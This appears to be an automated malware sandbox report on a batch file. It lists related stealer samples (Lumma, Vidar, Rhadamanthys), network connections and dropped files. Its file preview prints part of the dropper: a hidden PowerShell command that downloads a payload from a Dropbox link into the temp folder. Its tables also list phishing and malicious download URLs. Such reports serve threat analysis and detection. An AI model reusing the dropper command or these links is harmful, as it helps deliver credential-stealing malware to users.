	xWpAZpLw47.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	199.232.210.172
	ko.ps1.2.ps1	Get hash	malicious	Unknown	Browse	199.232.210.172
	EXTERNALRe.msg	Get hash	malicious	Unknown	Browse	199.232.210.172
	122046760.bat	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	pkqLAMAv96.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
chrome.cloudflare-dns.com	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse	172.64.41.3
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	installer.bat	Get hash	malicious	Vidar	Browse	172.64.41.3
	skript.bat	Get hash	malicious	Vidar	Browse	162.159.61.3
	din.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	lem.exe	Get hash	malicious	Vidar	Browse	162.159.61.3
	WRD1792.docx.doc	Get hash	malicious	Dynamer	Browse	162.159.61.3
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse	162.159.61.3
s-part-0035.t-0009.t-msedge.net	TbxHhK6lsS.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	MrIOYC1Pns.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	jPJaszTDNt.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUMFBJSDkxQ0w3VVZMNFJFUlNDRVkyU05CUi4u	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	JpzbUfhXi0.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	LPO-0048532025.lnk	Get hash	malicious	DarkVision Rat	Browse	13.107.246.63
	O53VxanH6A.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
www-env.dropbox-dns.com	https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0	Get hash	malicious	Unknown	Browse	162.125.65.18
	hnskdfgjgar22.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.65.18
	Setup.exe	Get hash	malicious	Unknown	Browse	162.125.65.18
	Setup.exe	Get hash	malicious	Unknown	Browse	162.125.69.18
	https://f.io/nWWUxvn6	Get hash	malicious	HTMLPhisher	Browse	162.125.65.18
	hnsadjhfg18De.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	slifdgjsidfg19.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	De17De16.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	fghdsdf17.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	hnghksdjfhs19De.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DROPBOXUS	https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0	Get hash	malicious	Unknown	Browse	162.125.21.3
	hnskdfgjgar22.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.65.18
	Setup.exe	Get hash	malicious	Unknown	Browse	162.125.69.15
	Setup.exe	Get hash	malicious	Unknown	Browse	162.125.69.15
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	162.125.232.208
	https://f.io/nWWUxvn6	Get hash	malicious	HTMLPhisher	Browse	162.125.65.18
	hnsadjhfg18De.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	slifdgjsidfg19.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	De17De16.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	fghdsdf17.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
AKAMAI-ASN1EU	N36e6JFEp6.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	k7T6akLcAr.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	SPzPNCzcCy.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	MrIOYC1Pns.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	fnnGMmd8eJ.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	PW6pjyv02h.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Script.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Neverlose.cc-unpadded.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
CLOUDFLARENETUS	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	k7T6akLcAr.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	SPzPNCzcCy.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	fnnGMmd8eJ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	lumma.ps1	Get hash	malicious	LummaC	Browse	172.67.167.249
	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
AKAMAI-ASN1EU	N36e6JFEp6.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	k7T6akLcAr.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	SPzPNCzcCy.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	MrIOYC1Pns.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	fnnGMmd8eJ.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	PW6pjyv02h.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Script.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Neverlose.cc-unpadded.exe	Get hash	malicious	LummaC	Browse	23.55.153.106

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	tzA45NGAW4.lnk	Get hash	malicious	Unknown	Browse	162.125.65.18
	lumma.ps1	Get hash	malicious	LummaC	Browse	162.125.65.18
	Titan.exe	Get hash	malicious	Unknown	Browse	162.125.65.18
	Titan.exe	Get hash	malicious	Unknown	Browse	162.125.65.18
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	162.125.65.18
	iviewers.dll	Get hash	malicious	LummaC	Browse	162.125.65.18
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	162.125.65.18
	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse	162.125.65.18
	TCKxnQ5CPn.exe	Get hash	malicious	Unknown	Browse	162.125.65.18
	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	162.125.65.18

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3275442909742046
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrV:KooCEYhgYEL0In
MD5:	FFAE5B95F4F2488F00224A2D842E3F1B
SHA1:	551B9F15362C1C14DC23703D1F1C68AE76C9DB05
SHA-256:	85E4AEA1369BBFF5438A69F28869D9185E8363AC5E93934A88EDD6FCAA44292C
SHA-512:	D3AC46207D9AB6B0B4271646EDAA0C47D41ECC41FD9882F0FEDB93113C5C2BE6CAB23BCAA637D3B8A18B415FE0606A7940DC680BA3100FB37B88BC74661B4A08
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	22842
Entropy (8bit):	6.046674957284339
Encrypted:	false
SSDEEP:	384:RtMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhXucZ32BT35ub/Y3jFd49:LMkbJrT8IeQc5d1HZ32BL5uTY3JU
MD5:	7FCA6A5C128F62B4AD35E8CE4E7A8526
SHA1:	62F0C2D7E9F943E52CC8524764393F6EA7D550E8
SHA-256:	0FA98C37404EF441B2988A47F3D2EC46E30D1E6AFD0CE5306D6CD62885F58F41
SHA-512:	62081CC5BD7C3C5D39D98ED36DCA37762D19F9BD6BC1F573E59916AAB1B1F2E63AAD65AF80584520FBDF89DD5ED339354B38B7816C4A4528EFF9D46814BE9FD3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379849139475268","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735375543"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	61147
Entropy (8bit):	5.077943793919534
Encrypted:	false
SSDEEP:	1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPa
MD5:	95B7548D8D8DDBAB0877BFC7F500503D
SHA1:	894B9735A30AE067FF88622B4F9C8EDF36997F6F
SHA-256:	D6C8E2EF650282C5B78D4CB89DE7FA47D0AC7A3818250101A2418B793D7C4BBA
SHA-512:	B552E36B17A92C584B269C73A9888AC67D19C28326EF39B7F1611CB6756B112BD113A9815EAB3BC6B51A6DBEFE4680C7532DD5D4F4102791BBB2021E4DDD8E54
Malicious:	false
Preview:	PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

File type:	DOS batch file, ASCII text, with very long lines (459), with CRLF line terminators
Entropy (8bit):	5.5470282107182305
TrID:
File name:	FLKCAS1DzH.bat
File size:	519 bytes
MD5:	17ece0b40e0d30e590955d79b4de9541
SHA1:	673913590c7bd10e084ec3e3ac49e2176cfba2bc
SHA256:	2d3151f761001ee38041d5b55ef6e3cc19e76b688bc42a9648d6f64a326dc063
SHA512:	9f272836bd4c4e30d07fd51a1da27187c070655a4f037ed7828db11efcd1fd7d82caff2163da8fb505ba36e27e22d5728422af12d497abfc43ae131b59203c47
SSDEEP:	12:0G81kFX0b11JktZM9kaMBfH1MRdEFvtyJk4pUrXB42Wgn:0GpObJIZdF+YCJV2R42WQ
TLSH:	9CF00ED732AF1AF9EFE0CC6210971382CA97351088A171D2F05C0618F688053BBD0A08
File Content Preview:	@echo off..powershell -WindowStyle Hidden -Command ^.. "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:45:31.269196033 CET	58080	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:45:31.409888029 CET	53	58080	1.1.1.1	192.168.2.4
Dec 28, 2024 09:45:44.896029949 CET	56749	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:45:44.896723032 CET	62260	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:45:45.527048111 CET	56399	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:45:45.527219057 CET	49406	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:45:45.667619944 CET	53	56399	1.1.1.1	192.168.2.4
Dec 28, 2024 09:45:45.768054008 CET	53	49406	1.1.1.1	192.168.2.4
Dec 28, 2024 09:45:46.402416945 CET	56042	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:45:46.402801037 CET	59056	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:45:46.403429031 CET	52186	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:45:46.403575897 CET	53053	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:45:46.473107100 CET	53157	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:45:46.473279953 CET	54577	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:45:46.541620016 CET	53	56042	1.1.1.1	192.168.2.4
Dec 28, 2024 09:45:46.542254925 CET	53	52186	1.1.1.1	192.168.2.4
Dec 28, 2024 09:45:46.542354107 CET	53	59056	1.1.1.1	192.168.2.4
Dec 28, 2024 09:45:46.542701006 CET	53	53053	1.1.1.1	192.168.2.4
Dec 28, 2024 09:45:46.612469912 CET	53	53157	1.1.1.1	192.168.2.4
Dec 28, 2024 09:45:46.612586975 CET	53	54577	1.1.1.1	192.168.2.4
Dec 28, 2024 09:45:48.360435009 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:48.664071083 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:49.270550966 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:49.534013987 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:49.534054995 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:49.534070969 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:49.534142017 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:49.536909103 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:49.539263010 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:49.539653063 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:49.551763058 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:49.593991041 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:49.862531900 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:49.862570047 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:49.862581968 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:49.862595081 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:49.863126040 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:49.863204956 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:49.875986099 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:49.892081976 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:49.906800985 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:49.907171011 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:50.185981989 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:50.212213993 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:50.737647057 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:50.737845898 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:50.773962975 CET	138	138	192.168.2.4	192.168.2.255
Dec 28, 2024 09:45:51.061558008 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:51.062470913 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:51.062999964 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:51.065504074 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:51.996407032 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:51.996943951 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:51.998259068 CET	54824	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:52.314285994 CET	54824	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:52.403096914 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:52.403106928 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:52.403116941 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:52.409106970 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:52.918088913 CET	54824	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:53.128762960 CET	443	54824	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:53.128778934 CET	443	54824	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:53.128845930 CET	443	54824	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:53.128885031 CET	443	54824	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:53.129590034 CET	54824	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:53.131123066 CET	54824	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:53.149136066 CET	54824	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:53.241143942 CET	443	54824	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:53.453843117 CET	443	54824	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:53.453922987 CET	443	54824	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:53.453933954 CET	443	54824	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:53.453943014 CET	443	54824	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:53.454360962 CET	54824	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:53.454447985 CET	54824	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:53.471754074 CET	443	54824	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:53.682297945 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:53.682410955 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:53.777339935 CET	443	54824	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:53.806546926 CET	54824	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:45:54.006644964 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:54.007781982 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:54.019880056 CET	443	64928	172.64.41.3	192.168.2.4
Dec 28, 2024 09:45:54.022703886 CET	64928	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:40.494052887 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:40.494215012 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:40.494483948 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:40.494560957 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:41.506972075 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:41.507095098 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:41.507647991 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:41.507705927 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:41.660854101 CET	443	61364	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:41.661664963 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:41.691518068 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:41.830045938 CET	443	61364	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:41.830069065 CET	443	61364	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:41.830106020 CET	443	61364	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:41.830117941 CET	443	61364	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:41.830132961 CET	443	61364	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:41.830148935 CET	443	61364	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:41.832775116 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:41.832869053 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:41.832917929 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:41.849423885 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:41.984545946 CET	443	61364	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:42.021667957 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:42.155744076 CET	443	61364	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:42.171957016 CET	443	61364	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:42.193125010 CET	61364	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:43.967787027 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:43.967915058 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:43.968096018 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:43.968204975 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:44.898380041 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:44.898483992 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:44.990103960 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:44.990192890 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:44.990770102 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:44.990796089 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:45.126132011 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.126827955 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:45.132313013 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:45.146305084 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:45.214458942 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.214494944 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.214504957 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.214510918 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.214987040 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:45.215044975 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:45.215106964 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:45.216012955 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.216023922 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.216319084 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:45.304125071 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.304174900 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.304186106 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.304516077 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:45.333690882 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:45.440937996 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.446522951 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.447562933 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.447774887 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:45.460505009 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.461086988 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.489862919 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:45.529069901 CET	443	59105	172.64.41.3	192.168.2.4
Dec 28, 2024 09:46:45.568025112 CET	59105	443	192.168.2.4	172.64.41.3
Dec 28, 2024 09:46:45.618717909 CET	443	59105	172.64.41.3	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:45:32 UTC	246	OUT	GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.dropbox.com Connection: Keep-Alive
2024-12-28 08:45:33 UTC	3872	IN	HTTP/1.1 200 OK Content-Security-Policy: font-src https://* data: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; img-src https:// data: blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropbox [TRUNCATED] Content-Type: text/html; charset=utf-8 Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=Mjc5MjU0ODk1MDM5NTQxMDc5ODc2Nzk0NTU5MTI5MzMxNzY0NTE1; Path=/; Expires=Thu, 27 Dec 2029 08:45:33 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=B3bPk24EX6TKmuFxUHyij5Pq; Path=/; Domain=dropbox.com; Expires=Sun, 28 Dec 2025 08:45:33 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=B3bPk24EX6TKmuFxUHyij5Pq; Path=/; Expires=Sun, 28 Dec 2025 08:45:33 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=ULTMmjSUGg; Path=/; Expires=Sun, 28 Dec 2025 08:45:33 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Thu, 27 Dec 2029 08:45:33 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, 